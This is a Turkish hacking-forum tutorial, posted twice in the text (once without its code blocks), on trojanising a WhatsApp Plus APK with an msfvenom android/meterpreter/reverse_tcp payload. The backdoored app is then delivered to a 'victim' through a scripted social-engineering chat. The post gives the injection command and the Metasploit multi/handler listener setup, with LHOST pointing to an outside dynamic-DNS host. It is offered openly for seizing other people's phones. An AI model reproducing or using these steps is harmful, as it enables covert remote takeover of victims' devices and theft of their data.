Android | Meterpreter APK Backdoor Birleştirme
Merhabalar THT Ailesi, bu konumda sizlere met@sploit yardımı ile Android tabanlı cep telefonlarını ele geçirmeniz için güzel bir yöntem paylaşacağım. Yöntemi paylaşmam için "üşengeçliği bırak" diyen "ChyNova" hocamıza teşekkür etmeniz yeterlidir. Bu konuyu onun üşengeçliği bırak dediği için paylaşıyorum Aynı zamanda içerisinde bulunmuş olduğum "Stajyer Asistan Kulübü" gereğince insanlığa faydalı şeyler öğretmek adına elimden geldiğince sizlere hack vs. konularında yardım edeceğim.
Öncelikle; Meterpreter Backdoor Birleştirme Nedir?
Konuyu daha iyi anlamanız yaptığımız adımların ne işe yaradığını daha iyi ve daha kolay kavrayabilmeniz açısından konuya başlamadan önce birazcık bahsetmek istiyorum. Bu kısmı okumanızda gerçekten fayda var.
Backdoor Birleştirme dediğim olay şudur, normalde oluşturduğunuz Backdoor.apk dosyasını kurbana yedirirken kullandığınız SM yöntemi birazcık kuvvetli olması gerektiğini düşünüyorum. Çünkü kimse kolay kolay telefonuna "MainActivity" tarzında bir program yüklemez. Şahsen kendim yüklemem
E bu konuda ne yapabiliriz diyorsanız tam olarak ne yapmanız gerektiğini anlatacağım
Ben kendi kullandığım SM yöntemi ile devam edeceğim, Sizde bunu kullanabilirsiniz gayet işe yaramaktadır.
Whatsapp Plus programını hepiniz biliyorsunuzdur. Görünmezlik modları vs. gibi ilginç şeyler bulunmakta.
Öncelikle kendiniz normal Whatsapp Plus ile Plus eklentileri açıp yazın, konuşma şu şekilde olabilir;
Tabi kurbanımız doğal olarak apk'sını sizden isteyecektir. Öncelikle programın havasını güzelce atabilirsiniz bu SM yönteminde
Whatsapp Plus programını buradan indirebilirsiniz; https://www.official-plus.com/dawnload-whatsapp-plus
Evet şimdi konumuz asıl olarak burada başlıyor. Şimdiye kadar sadece bu yöntemi nasıl yedirebileceğiniz hakkında ufak bilgiler verdim size
Kurbana göndereceğimiz Whatsapp Plus APK'sına "BACKDOOR" enjekte edelim.
Herhangi Bir APK Dosyasına Backdoor Enjekte Etme
Öncelikle ihtiyacımız olan şeyler;
1-) Enjekte Edilecek APK Dosyası ( Konuya Göre Whatsapp Plus olarak devam ediyorum )
2-) Kali Linux ( veya eklentileri sorunsuzca kullanabildiğiniz bir Debian/Ubuntu OS )
Eğer Her şey sorunsuzca ilerliyorsa artık başlayabiliriz Haydi Bismillâh!
ADIM 1: GEREKLİ MODÜLLERİ YÜKLEME
Öncelikle APK Dosyasına BACKDOOR'u Sorunsuzca ejekte edebilmek için birkaç modüle ihtiyacımız var.
1. Modül "zipalign"
yukarıdaki komutlardan birisi ile zipalign modülünü Kali Linux'a yüklemeniz gerekmekte. Eğer Sources.List dosyanızda modülü bulamıyorsa Google'da ufak bir araştırma yaparak bu sorunun üstesinden nasıl gelebileceğinizi öğrenebilirsiniz. Yapamadığınız her sorunda mesaj atabilirsiniz.
Modül bende zaten yüklü olduğu için Kali yüklemeyi tekrardan yapmadı. Burada dikkat etmeniz gereken noktalar modülün yüklenip yüklenmediğinden kesinlikle emin olmak.
2. Modül "apktool"
yukarıdaki komutlardan birisi ile apktool modülünü Kali Linux'a yüklemeniz gerekmekte. Eğer Sources.List dosyanızda modülü bulamıyorsa Google'da ufak bir araştırma yaparak bu sorunun üstesinden nasıl gelebileceğinizi öğrenebilirsiniz. Yapamadığınız her sorunda mesaj atabilirsiniz.
Modül bende zaten yüklü olduğu için Kali yüklemeyi tekrardan yapmadı. Burada dikkat etmeniz gereken noktalar modülün yüklenip yüklenmediğinden kesinlikle emin olmak.
ADIM 2: APK DOSYASINA BACKDOOR ENJEKTE ETMEK
Modüllerimiz sorunsuzca yüklendiyse şayet APK dosyamıza BACKDOOR'u enjekte etmeye başlayabiliriz.
Yukarda kodunu ve resimde tam olarak nasıl kullanacağınızı gösterdim. Bilgileri kendi bilgileriniz ile değiştirdikten sonra enter'a basıp enjekte işlemini başlatabiliriz.
Resimde görmüş olduğunuz gibi "msfvenom" modülümüz Whatsapp+.apk dosyasına yeni izinler ve payload'ı enjekte etti.
Ve yeni APKmız belirttiğimiz isimde oluştu Hayırlı Olsun
Yukardaki resimdeki gibi artık Backdoor enjekte edilmiş APK dosyasını artık kurbana göndermeye hazırsınız !
Ama acele etmeyin tabi, ne demişler acele işe şeytan karışır. Öncelikle "met@sploit" üzerinden backdoorumuzu dinlemeye alalım
ADIM 3: MET@SPLOİT ÜZERİNDEN BACKDOOR DİNLEMEYE ALMA
Met@sploit'i açmak için terminal penceremize "msfconsole" komutunu yazalım ve enter'a basalım.
Met@sploit açılana kadar bekleyelim....
Met@sploit açıldığına göre exploitimizi seçelim;
resimde de gördüğünüz gibi
komutu ile exploitimizi seçip enter'a basalım.
Exploitimiz seçili hale geldikten sonra "set payload" komutu ile payloadımızı belirleyelim.
tam olarak yazmanız gereken kod şudur;
Yaparak payloadımızı seçelim..
payload'ımız seçildikten sonra konsolda;
komutunu kullanarak ayarlara bakalım.
LHOST ve LPORT'umuzu ayarlamamız gerekiyor..
komutları ile APK oluştururken girdiğimiz host ve port'u değiştiriyoruz.
LHOST ve LPORT'u değiştirdik ve ne olur ne olmaz diye show options ile tekrardan baktık. ve evet sorun yok artık portumuzu dinlemeye başlayabiliriz.
komutu ile portumuzu dinlemeye başladık.
Artık Backdoor enjekte edilmiş apk dosyamızı kurbanımıza gönderebiliriz.
Kurbanımız apk'yı yükleyip açtığı an "meterpreter" oturumu açıcaksınız.
Hepinize Kolay Gelsin Arkadaşlar. Bir Sonraki Konumda Görüşürüz
Önemli Not: Resimde benim komutların sonlarında "\r" gibi bir ek var. komutları girerken siz öyle şeyler eklemeyin. bende kendi kendine ekliyor çözemedim onu da
Merhabalar THT Ailesi, bu konumda sizlere met@sploit yardımı ile Android tabanlı cep telefonlarını ele geçirmeniz için güzel bir yöntem paylaşacağım. Yöntemi paylaşmam için "üşengeçliği bırak" diyen "ChyNova" hocamıza teşekkür etmeniz yeterlidir. Bu konuyu onun üşengeçliği bırak dediği için paylaşıyorum Aynı zamanda içerisinde bulunmuş olduğum "Stajyer Asistan Kulübü" gereğince insanlığa faydalı şeyler öğretmek adına elimden geldiğince sizlere hack vs. konularında yardım edeceğim.
Öncelikle; Meterpreter Backdoor Birleştirme Nedir?
Konuyu daha iyi anlamanız yaptığımız adımların ne işe yaradığını daha iyi ve daha kolay kavrayabilmeniz açısından konuya başlamadan önce birazcık bahsetmek istiyorum. Bu kısmı okumanızda gerçekten fayda var.
Backdoor Birleştirme dediğim olay şudur, normalde oluşturduğunuz Backdoor.apk dosyasını kurbana yedirirken kullandığınız SM yöntemi birazcık kuvvetli olması gerektiğini düşünüyorum. Çünkü kimse kolay kolay telefonuna "MainActivity" tarzında bir program yüklemez. Şahsen kendim yüklemem
E bu konuda ne yapabiliriz diyorsanız tam olarak ne yapmanız gerektiğini anlatacağım
Ben kendi kullandığım SM yöntemi ile devam edeceğim, Sizde bunu kullanabilirsiniz gayet işe yaramaktadır.
Whatsapp Plus programını hepiniz biliyorsunuzdur. Görünmezlik modları vs. gibi ilginç şeyler bulunmakta.
Öncelikle kendiniz normal Whatsapp Plus ile Plus eklentileri açıp yazın, konuşma şu şekilde olabilir;
Kod:
+Whatsapp Plus diye bir şey yükledim çok iyi
- Ne işe yarıyor?
+ Çevrim içi olduğunu kimse görmüyor felan, "yazıyor..." ifadesini kaldırıyosun gibi özellikleri var
- iyimiş :D
+ Apksı var bende sana da atayım bak bi :D Multi hesapta açabiliyorsun.
Tabi kurbanımız doğal olarak apk'sını sizden isteyecektir. Öncelikle programın havasını güzelce atabilirsiniz bu SM yönteminde
Whatsapp Plus programını buradan indirebilirsiniz; https://www.official-plus.com/dawnload-whatsapp-plus
Evet şimdi konumuz asıl olarak burada başlıyor. Şimdiye kadar sadece bu yöntemi nasıl yedirebileceğiniz hakkında ufak bilgiler verdim size
Kurbana göndereceğimiz Whatsapp Plus APK'sına "BACKDOOR" enjekte edelim.
Herhangi Bir APK Dosyasına Backdoor Enjekte Etme
Öncelikle ihtiyacımız olan şeyler;
1-) Enjekte Edilecek APK Dosyası ( Konuya Göre Whatsapp Plus olarak devam ediyorum )
2-) Kali Linux ( veya eklentileri sorunsuzca kullanabildiğiniz bir Debian/Ubuntu OS )
Eğer Her şey sorunsuzca ilerliyorsa artık başlayabiliriz Haydi Bismillâh!
ADIM 1: GEREKLİ MODÜLLERİ YÜKLEME
Öncelikle APK Dosyasına BACKDOOR'u Sorunsuzca ejekte edebilmek için birkaç modüle ihtiyacımız var.
1. Modül "zipalign"
Kod:
apt-get install zipalign
veya
sudo apt-get install zipalign
yukarıdaki komutlardan birisi ile zipalign modülünü Kali Linux'a yüklemeniz gerekmekte. Eğer Sources.List dosyanızda modülü bulamıyorsa Google'da ufak bir araştırma yaparak bu sorunun üstesinden nasıl gelebileceğinizi öğrenebilirsiniz. Yapamadığınız her sorunda mesaj atabilirsiniz.
Modül bende zaten yüklü olduğu için Kali yüklemeyi tekrardan yapmadı. Burada dikkat etmeniz gereken noktalar modülün yüklenip yüklenmediğinden kesinlikle emin olmak.
2. Modül "apktool"
Kod:
apt-get install apktool
veya
sudo apt-get install apktool
yukarıdaki komutlardan birisi ile apktool modülünü Kali Linux'a yüklemeniz gerekmekte. Eğer Sources.List dosyanızda modülü bulamıyorsa Google'da ufak bir araştırma yaparak bu sorunun üstesinden nasıl gelebileceğinizi öğrenebilirsiniz. Yapamadığınız her sorunda mesaj atabilirsiniz.
Modül bende zaten yüklü olduğu için Kali yüklemeyi tekrardan yapmadı. Burada dikkat etmeniz gereken noktalar modülün yüklenip yüklenmediğinden kesinlikle emin olmak.
ADIM 2: APK DOSYASINA BACKDOOR ENJEKTE ETMEK
Modüllerimiz sorunsuzca yüklendiyse şayet APK dosyamıza BACKDOOR'u enjekte etmeye başlayabiliriz.
Kod:
msfvenom -x "apkdosyası" -p android/meterpreter/reverse_tcp LHOST=hostadresiniz LPORT=portunuz -o yeniapkdosyaadınız.apk
Yukarda kodunu ve resimde tam olarak nasıl kullanacağınızı gösterdim. Bilgileri kendi bilgileriniz ile değiştirdikten sonra enter'a basıp enjekte işlemini başlatabiliriz.
Resimde görmüş olduğunuz gibi "msfvenom" modülümüz Whatsapp+.apk dosyasına yeni izinler ve payload'ı enjekte etti.
Ve yeni APKmız belirttiğimiz isimde oluştu Hayırlı Olsun
Yukardaki resimdeki gibi artık Backdoor enjekte edilmiş APK dosyasını artık kurbana göndermeye hazırsınız !
Ama acele etmeyin tabi, ne demişler acele işe şeytan karışır. Öncelikle "met@sploit" üzerinden backdoorumuzu dinlemeye alalım
ADIM 3: MET@SPLOİT ÜZERİNDEN BACKDOOR DİNLEMEYE ALMA
Met@sploit'i açmak için terminal penceremize "msfconsole" komutunu yazalım ve enter'a basalım.
Met@sploit açılana kadar bekleyelim....
Met@sploit açıldığına göre exploitimizi seçelim;
resimde de gördüğünüz gibi
Kod:
use exploit/multi/handler
komutu ile exploitimizi seçip enter'a basalım.
Exploitimiz seçili hale geldikten sonra "set payload" komutu ile payloadımızı belirleyelim.
tam olarak yazmanız gereken kod şudur;
Kod:
set payload android/meterpreter/reverse_tcp
Yaparak payloadımızı seçelim..
payload'ımız seçildikten sonra konsolda;
Kod:
show options
komutunu kullanarak ayarlara bakalım.
LHOST ve LPORT'umuzu ayarlamamız gerekiyor..
Kod:
set LHOST zekr1d.duckdns.org
set LPORT 4444
siz kendi port ve hostunuzu yazın
komutları ile APK oluştururken girdiğimiz host ve port'u değiştiriyoruz.
LHOST ve LPORT'u değiştirdik ve ne olur ne olmaz diye show options ile tekrardan baktık. ve evet sorun yok artık portumuzu dinlemeye başlayabiliriz.
Kod:
exploit
komutu ile portumuzu dinlemeye başladık.
Artık Backdoor enjekte edilmiş apk dosyamızı kurbanımıza gönderebiliriz.
Kurbanımız apk'yı yükleyip açtığı an "meterpreter" oturumu açıcaksınız.
Hepinize Kolay Gelsin Arkadaşlar. Bir Sonraki Konumda Görüşürüz
Önemli Not: Resimde benim komutların sonlarında "\r" gibi bir ek var. komutları girerken siz öyle şeyler eklemeyin. bende kendi kendine ekliyor çözemedim onu da
bengaripadam | THT
alıntı değildir...
alıntı değildir...
Moderatör tarafında düzenlendi: